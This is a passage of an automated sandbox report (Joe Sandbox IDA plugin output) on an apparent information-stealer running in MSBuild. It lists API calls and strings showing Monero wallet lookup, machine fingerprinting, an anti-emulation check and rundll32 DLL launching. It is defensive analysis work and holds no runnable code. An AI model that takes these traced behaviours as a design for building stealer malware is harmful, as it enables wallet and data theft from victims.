Associated: 00000008.00000002.3052243286.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.000000000048F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.0000000000494000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.00000000004B3000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.00000000004D2000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.000000000056B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.0000000000656000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: lstrcat$CloseOpenQueryValue_memset
String ID: .{A
API String ID: 3891774339-8545219
Opcode ID: f6d98237a04e32636f27a897e0831807c899ef243b91f7b553c1fbd532b5787d
Instruction ID: b4758eb7aeb23ac53986d5a941949a19eceae9c1109b67c9f6111efe06dcff68
Opcode Fuzzy Hash: f6d98237a04e32636f27a897e0831807c899ef243b91f7b553c1fbd532b5787d
Instruction Fuzzy Hash: 0C41C07194011D9FDF24EF60EC86EE9777ABB18309F4004AAB509A31A0EE759FC58F94

Function 00407FAC Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 60filememoryCOMMON

Download Yara Rule

APIs

CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,?,?,?,0040E756,?,?,?), ref: 00407FC7
GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,0040E756,?,?,?), ref: 00407FDE
LocalAlloc.KERNEL32(00000040,?,?,?,?,?,0040E756,?,?,?), ref: 00407FF5
ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,0040E756,?,?,?), ref: 0040800C
LocalFree.KERNEL32(0040ECBC,?,?,?,?,0040E756,?,?,?), ref: 0040802B
CloseHandle.KERNEL32(?,?,?,?,?,0040E756,?,?,?), ref: 00408034

Strings

V@, xrefs: 00408042

Memory Dump Source

Source File: 00000008.00000002.3052243286.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.3052243286.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.000000000048F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.0000000000494000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.00000000004B3000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.00000000004D2000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.000000000056B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.0000000000656000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: File$Local$AllocCloseCreateFreeHandleReadSize
String ID: V@
API String ID: 2311089104-383300688
Opcode ID: d63a5464314b69c61ac75c0db440d02a9ca78bdcd81ff691c89ea163c61aca46
Instruction ID: 10e4ee5bcd24e5c00d10c93a2cb3902743b6293cd5753d2e79081f11b23a5eb1
Opcode Fuzzy Hash: d63a5464314b69c61ac75c0db440d02a9ca78bdcd81ff691c89ea163c61aca46
Instruction Fuzzy Hash: 47116070900204EFDF25DF64DD88EAF7BB9EB48741F20056AF481F2290EB769A85DB11

Function 004115D4 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 48registryCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00411607
RegOpenKeyExA.KERNEL32(80000002,SOFTWARE\Microsoft\Cryptography,00000000,00020119,?,?,?,?), ref: 00411626
RegQueryValueExA.KERNEL32(?,MachineGuid,00000000,00000000,?,000000FF,?,?,?), ref: 0041164B
RegCloseKey.ADVAPI32(?,?,?,?), ref: 00411657
CharToOemA.USER32(?,?), ref: 0041166B

Strings

MachineGuid, xrefs: 00411640
SOFTWARE\Microsoft\Cryptography, xrefs: 0041161C

Memory Dump Source

Source File: 00000008.00000002.3052243286.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.3052243286.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.000000000048F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.0000000000494000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.00000000004B3000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.00000000004D2000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.000000000056B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.0000000000656000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: CharCloseOpenQueryValue_memset
String ID: MachineGuid$SOFTWARE\Microsoft\Cryptography
API String ID: 2235053359-1211650757
Opcode ID: 05f0a82242895fb301977400293e6bc20ca52c8c5dc3207f31c15ae16d7e7e80
Instruction ID: c9c539ce5467448423737f6d9a950d2a9d5193a79ae08df00dacda0898e1b174
Opcode Fuzzy Hash: 05f0a82242895fb301977400293e6bc20ca52c8c5dc3207f31c15ae16d7e7e80
Instruction Fuzzy Hash: 7B111EB590021DAFDB10DF90DC89FEAB7BDEB04309F5041E6A659E2052E6759F888F14

Function 00401A51 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 35registrymemoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,?), ref: 00401A65
HeapAlloc.KERNEL32(00000000), ref: 00401A6C
RegOpenKeyExA.KERNEL32(80000001,SOFTWARE\monero-project\monero-core,00000000,00020119,00401AE9), ref: 00401A89
RegQueryValueExA.ADVAPI32(00401AE9,wallet_path,00000000,00000000,00000000,000000FF), ref: 00401AA4
RegCloseKey.ADVAPI32(00401AE9), ref: 00401AAD

Strings

wallet_path, xrefs: 00401A9C
SOFTWARE\monero-project\monero-core, xrefs: 00401A7F

Memory Dump Source

Source File: 00000008.00000002.3052243286.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.3052243286.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.000000000048F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.0000000000494000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.00000000004B3000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.00000000004D2000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.000000000056B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.0000000000656000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: Heap$AllocCloseOpenProcessQueryValue
String ID: SOFTWARE\monero-project\monero-core$wallet_path
API String ID: 3466090806-4244082812
Opcode ID: da1045694f7c1a98f785db87d1439f5f65af28086f388a3e5cebff55084345b5
Instruction ID: 3e4ac90b5bcc3d6fe188be62ffa2ac0dd84bb3fe34a2510e6e6e226720dcc0e4
Opcode Fuzzy Hash: da1045694f7c1a98f785db87d1439f5f65af28086f388a3e5cebff55084345b5
Instruction Fuzzy Hash: 15F05475780304BFFF14DB90DC0EFAE7A7DDB44B06F141065B601A51D0E7B66A50D664

Function 00410B30 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40registrymemoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,00000000,?,?,?,00413E95,Windows: ,004368A0), ref: 00410B44
HeapAlloc.KERNEL32(00000000,?,?,?,00413E95,Windows: ,004368A0), ref: 00410B4B
RegOpenKeyExA.KERNEL32(80000002,00000000,00020119,00436888,?,?,?,00413E95,Windows: ,004368A0), ref: 00410B79
RegQueryValueExA.KERNEL32(00436888,00000000,00000000,00000000,000000FF,?,?,?,00413E95,Windows: ,004368A0), ref: 00410B95
RegCloseKey.ADVAPI32(00436888,?,?,?,00413E95,Windows: ,004368A0), ref: 00410B9E

Strings

Windows 11, xrefs: 00410B5C

Memory Dump Source

Source File: 00000008.00000002.3052243286.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.3052243286.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.000000000048F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.0000000000494000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.00000000004B3000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.00000000004D2000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.000000000056B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.0000000000656000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: Heap$AllocCloseOpenProcessQueryValue
String ID: Windows 11
API String ID: 3466090806-2517555085
Opcode ID: e3368c902befc4cf7a45888ed36aa8236a31042c29ba286c6ff82d11e2c4ce16
Instruction ID: c636f12a4b9fd3341eb7223670fa9a8d4496e2c02347a6f2be12f88bf3247473
Opcode Fuzzy Hash: e3368c902befc4cf7a45888ed36aa8236a31042c29ba286c6ff82d11e2c4ce16
Instruction Fuzzy Hash: 1AF06875600304FBFF149BD1DC4AFAB7A7EEB4470AF1410A5F601D5190E7B6AA909714

Function 00410BA9 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 36registrymemoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,00000000,?,?,?,00410C1B,00410B58,?,?,?,00413E95,Windows: ,004368A0), ref: 00410BBD
HeapAlloc.KERNEL32(00000000,?,?,?,00410C1B,00410B58,?,?,?,00413E95,Windows: ,004368A0), ref: 00410BC4
RegOpenKeyExA.KERNEL32(80000002,00000000,00020119,00436888,?,?,?,00410C1B,00410B58,?,?,?,00413E95,Windows: ,004368A0), ref: 00410BE2
RegQueryValueExA.KERNEL32(00436888,CurrentBuildNumber,00000000,00000000,00000000,000000FF,?,?,?,00410C1B,00410B58,?,?,?,00413E95,Windows: ), ref: 00410BFD
RegCloseKey.ADVAPI32(00436888,?,?,?,00410C1B,00410B58,?,?,?,00413E95,Windows: ,004368A0), ref: 00410C06

Strings

CurrentBuildNumber, xrefs: 00410BF5

Memory Dump Source

Source File: 00000008.00000002.3052243286.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.3052243286.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.000000000048F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.0000000000494000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.00000000004B3000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.00000000004D2000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.000000000056B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.0000000000656000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: Heap$AllocCloseOpenProcessQueryValue
String ID: CurrentBuildNumber
API String ID: 3466090806-1022791448
Opcode ID: c84c6eb54361118da4c3cf5dc7048b6cc90d818083839d71d976e1457e1e6126
Instruction ID: adfa9e2f60a12e4d5f9b95a3627e322926d469c0f3b43989f67d349f50e983ff
Opcode Fuzzy Hash: c84c6eb54361118da4c3cf5dc7048b6cc90d818083839d71d976e1457e1e6126
Instruction Fuzzy Hash: E9F09075640304BBEF159B90DC0AFAF7A7EEB44B06F240055F601A50A0E6B25A909B50

Function 00411757 Relevance: 9.1, APIs: 6, Instructions: 58commemoryCOMMON

Download Yara Rule

APIs

__EH_prolog3_catch.LIBCMT ref: 0041175E
CoCreateInstance.OLE32(004331B0,00000000,00000001,0043B018,?,00000018,00411901,?), ref: 00411781
SysAllocString.OLEAUT32(?), ref: 0041178E
_wtoi64.MSVCRT ref: 004117C1
SysFreeString.OLEAUT32(?), ref: 004117DA
SysFreeString.OLEAUT32(00000000), ref: 004117E1

Memory Dump Source

Source File: 00000008.00000002.3052243286.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.3052243286.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.000000000048F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.0000000000494000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.00000000004B3000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.00000000004D2000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.000000000056B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.0000000000656000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: String$Free$AllocCreateH_prolog3_catchInstance_wtoi64
String ID:
API String ID: 181426013-0
Opcode ID: c2f6d16d6af2cd9c2543edbdd70375dccd549122af3fd15938b7ee4cd554efb1
Instruction ID: 0994ca530c552eb12484d48fed68a7c00db0df5c681817d2f603923d478d8980
Opcode Fuzzy Hash: c2f6d16d6af2cd9c2543edbdd70375dccd549122af3fd15938b7ee4cd554efb1
Instruction Fuzzy Hash: B1114C75A0420ADFCB019FA4CC989EEBBB5AF49310F64417EF215E73A0CB394945CB68

Function 004010F0 Relevance: 9.1, APIs: 6, Instructions: 54memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32(00000000,001E5D70,00003000,00000004), ref: 004010AA
_memset.LIBCMT ref: 004010D0
VirtualFree.KERNEL32(00000000,001E5D70,00008000), ref: 004010E6
GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000,004185DC), ref: 00401100
VirtualAllocExNuma.KERNEL32(00000000), ref: 00401107
ExitProcess.KERNEL32 ref: 00401112

Memory Dump Source

Source File: 00000008.00000002.3052243286.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.3052243286.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.000000000048F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.0000000000494000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.00000000004B3000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.00000000004D2000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.000000000056B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.0000000000656000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: Virtual$AllocProcess$CurrentExitFreeNuma_memset
String ID:
API String ID: 1859398019-0
Opcode ID: a924c371d945ebb2b407fd39f7f412d7c5603bda08bc6eafd39d46e5dedd0ee5
Instruction ID: 46aed83c215a1155ddf1663667cd5ec87320cd9fa35168939231c0eb8388c106
Opcode Fuzzy Hash: a924c371d945ebb2b407fd39f7f412d7c5603bda08bc6eafd39d46e5dedd0ee5
Instruction Fuzzy Hash: 57F0C27278122077F22422763C6EFAB5A6C9B42F56F205035F309FB2D0D66998049ABC

Function 00412962 Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 182COMMON

Download Yara Rule

APIs

Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041718B,004366CD,?,?,?,?,0041869F), ref: 0041050D

Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,004171AC,00436C18,00000000,004366CD,?,?,?,?,0041869F), ref: 0041061D
Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,004171AC,00436C18,00000000,004366CD,?,?,?,?,0041869F), ref: 00410645
Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,004171AC,00436C18,00000000,004366CD,?,?,?,?,0041869F), ref: 00410650

Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004171CA,00436C18,00000000,004366CD,?,?,?,?,0041869F), ref: 004105BD

Part of subcall function 00411C4A: GetSystemTime.KERNEL32(?,00436701,?), ref: 00411C79

Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,004176F9,004366DA), ref: 004105F5
Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF

ShellExecuteEx.SHELL32(?), ref: 00412B84

Strings

C:\ProgramData\, xrefs: 00412995
C:\Windows\system32\rundll32.exe, xrefs: 00412AE3
"" , xrefs: 00412A32
.dll, xrefs: 004129ED

Memory Dump Source

Source File: 00000008.00000002.3052243286.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.3052243286.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.000000000048F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.0000000000494000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.00000000004B3000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.00000000004D2000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.000000000056B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.0000000000656000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrcat$ExecuteShellSystemTimelstrlen
String ID: "" $.dll$C:\ProgramData\$C:\Windows\system32\rundll32.exe
API String ID: 2215929589-2108736111
Opcode ID: 3c3eaabb6bf30a628491cb7f6c6410e5825dbbecd231003ae5c9a6d33902ade5
Instruction ID: fcd8ae3be328f2bece2d36ab058f070ab7b5b8f350f6457e4fbb623da5ab610c
Opcode Fuzzy Hash: 3c3eaabb6bf30a628491cb7f6c6410e5825dbbecd231003ae5c9a6d33902ade5
Instruction Fuzzy Hash: 4871EE71E40119ABCF10FFA6DD466CDB7B5AF04308F51406BF510B7191DBB8AE8A8B98

Function 00411684 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 60stringCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 004116CE

Part of subcall function 004123D5: malloc.MSVCRT ref: 004123DA
Part of subcall function 004123D5: strncpy.MSVCRT ref: 004123EB

lstrcatA.KERNEL32(?,00000000,?,?,?,?,?), ref: 004116F6
lstrcatA.KERNEL32(?,00436ECC,?,?,?,?,?), ref: 00411713
GetCurrentHwProfileA.ADVAPI32(?), ref: 0041169F

Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041718B,004366CD,?,?,?,?,0041869F), ref: 0041050D

Strings

Unknown, xrefs: 0041173C

Memory Dump Source

Source File: 00000008.00000002.3052243286.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.3052243286.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.000000000048F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.0000000000494000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.00000000004B3000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.00000000004D2000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.000000000056B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.0000000000656000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: lstrcat$CurrentProfile_memsetlstrcpymallocstrncpy
String ID: Unknown
API String ID: 2781187439-1654365787
Opcode ID: 7ac010871cfdc6928f55026d9108d12a4a42d5102455bbea89dd41d9649856e6
Instruction ID: cfd5adc8c7fec37571e4615a2d659ce623d81488d817e1095ce6785adf6647ed
Opcode Fuzzy Hash: 7ac010871cfdc6928f55026d9108d12a4a42d5102455bbea89dd41d9649856e6
Instruction Fuzzy Hash: 1A11B971A0011CABCB10EB65DC45FCD7378AB14704F0000A6B645E7191DAB89FC88F58

Function 00411119 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 45memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,?,Keyboard Languages: ,00436910,Display Resolution: ,004368F4,00000000,User Name: ,004368E4,00000000,Computer Name: ,004368D0,AV: ,004368C4,Install Date: ), ref: 00411131
HeapAlloc.KERNEL32(00000000), ref: 00411138
GlobalMemoryStatusEx.KERNEL32(?,?,00000040), ref: 00411154
wsprintfA.USER32 ref: 0041117A

Strings

%d MB, xrefs: 00411174

Memory Dump Source

Source File: 00000008.00000002.3052243286.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.3052243286.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.000000000048F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.0000000000494000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.00000000004B3000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.00000000004D2000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.000000000056B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.0000000000656000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: Heap$AllocGlobalMemoryProcessStatuswsprintf
String ID: %d MB
API String ID: 3644086013-2651807785
Opcode ID: 17f18dc7cf53f9ebfacd37114c0aa46941e1124f845af7428171d2bc88ac11d2
Instruction ID: d79e8d54b07d2f615201cd360c868d95b9dac01f4be2040cf9acff1c057e51b0
Opcode Fuzzy Hash: 17f18dc7cf53f9ebfacd37114c0aa46941e1124f845af7428171d2bc88ac11d2
Instruction Fuzzy Hash: F201A9B1E00218BBEB08DFB4DC45EEFB7B9EF08705F04006AF602D7290EA7599818758

Function 0041BD34 Relevance: 7.6, APIs: 5, Instructions: 99fileCOMMON

Download Yara Rule

APIs

SetFilePointer.KERNEL32(?,00000000,00000000,00000001,759774F0,?,0041CD01,?,0041CD8F,00000000,06400000,00000003,00000000,0041768F,.exe,00436C5C), ref: 0041BD81
CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000,759774F0,?,0041CD01,?,0041CD8F,00000000,06400000,00000003,00000000), ref: 0041BDB9

Memory Dump Source

Source File: 00000008.00000002.3052243286.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.3052243286.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.000000000048F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.0000000000494000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.00000000004B3000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.00000000004D2000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.000000000056B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.0000000000656000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: File$CreatePointer
String ID:
API String ID: 2024441833-0
Opcode ID: c2a5f8e1d00489231e5594f9a747e25d59c8a13e659a0516d0e6ae57d101117a
Instruction ID: 96129ee170b6e52e4a698042c6e04e57a17f8ea6b04b39fd16cd668f0541581b
Opcode Fuzzy Hash: c2a5f8e1d00489231e5594f9a747e25d59c8a13e659a0516d0e6ae57d101117a
Instruction Fuzzy Hash: F23165B05047049FDB349F25D898BE77AE9EB14354F108B2FE296D2680D33898C4CB99

Function 00404AB6 Relevance: 7.6, APIs: 5, Instructions: 50stringnetworkCOMMON

Download Yara Rule

APIs

??_U@YAPAXI@Z.MSVCRT(00000400,?), ref: 00404AE8
??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AEE
??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AF4
lstrlenA.KERNEL32(000000FF,00000000,?), ref: 00404B06
